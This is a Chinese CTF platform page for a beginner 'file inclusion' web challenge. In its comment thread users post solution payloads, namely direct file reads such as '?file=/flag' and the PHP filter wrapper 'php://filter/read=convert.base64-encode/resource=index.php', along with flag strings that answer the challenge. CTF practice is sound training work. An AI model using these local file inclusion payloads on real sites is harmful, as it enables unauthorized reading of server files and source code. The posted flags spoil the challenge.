文件包含WEB 未解决

分数: 20 金币: 2
题目作者: harry
一  血: 不会CTF的麻风
一血奖励: 1金币
解  决: 11997
提  示:
描  述:
flag{}
评论
zhuizhui 6天前

?file=php://filter/read=convert.base64-encode/resource=index.php

回复 0

17734916426 2月前

index.php?file=/flag

回复 0

shingu 3月前

这题过于简单了。?file=/flag。

回复 2

HK1ng 6月前

使用伪协议来解题,启动靶机发现有超链接,点击后发现有file变量,然后页面有index.php,于是猜想是不是传一个index.php,果然不是。然后就给出这个提示,想办法去读一下这个,然后这里就是用了php://filter/read=convert.base64encode/resource=filepath,表示以base64编码的方式进行读取指定路径的文件。然后解码就可以看到。

回复 3

000ooo 7月前

/index.php?file=/flag

回复 1
哈哈哈嘿嘿嘿 3月前

为什么

回复 0

Zhumeng 7月前

php伪协议读取index.php

回复 1
Jiafeng 6月前

我在你的评论下面补充全吧:php://filter/convert.base64-encode/resource=index.php

回复 0

Wang_Micro 7月前

flag{642c1d8cf84d01e3a2df403e83d3e43b}

回复 0

33555 7月前

/index.php?file=///flag

回复 1

Pearpeach1 8月前

?file=php://filter/read=convert.base64-encode/resource=index.php

回复 0

hao7 8月前

flag{dff1aea3fcdd906ce70c1998addf1ccc}

回复 0

WriteUp

image
harry

2 金币

评分(11)

解题动态

海浪geigei 攻破了该题 9小时前
merrymu 攻破了该题 23小时前
Hehe0619 攻破了该题 1天前
sun03 攻破了该题 1天前
春遇枝庭 攻破了该题 1天前
Snly 攻破了该题 2天前
YGLZ 攻破了该题 2天前
ffggfhge 攻破了该题 2天前
小白ctf 攻破了该题 2天前
17335918325 攻破了该题 3天前
shimen 攻破了该题 3天前
北城以北 攻破了该题 3天前
人闲桂花落 攻破了该题 3天前
roopelee 攻破了该题 4天前
lwlzjsj 攻破了该题 4天前
Xman21 攻破了该题 4天前
TheSunnyTeens 攻破了该题 4天前
dwx1583 攻破了该题 4天前
hua1232 攻破了该题 5天前
ricardoLi 攻破了该题 5天前
问题反馈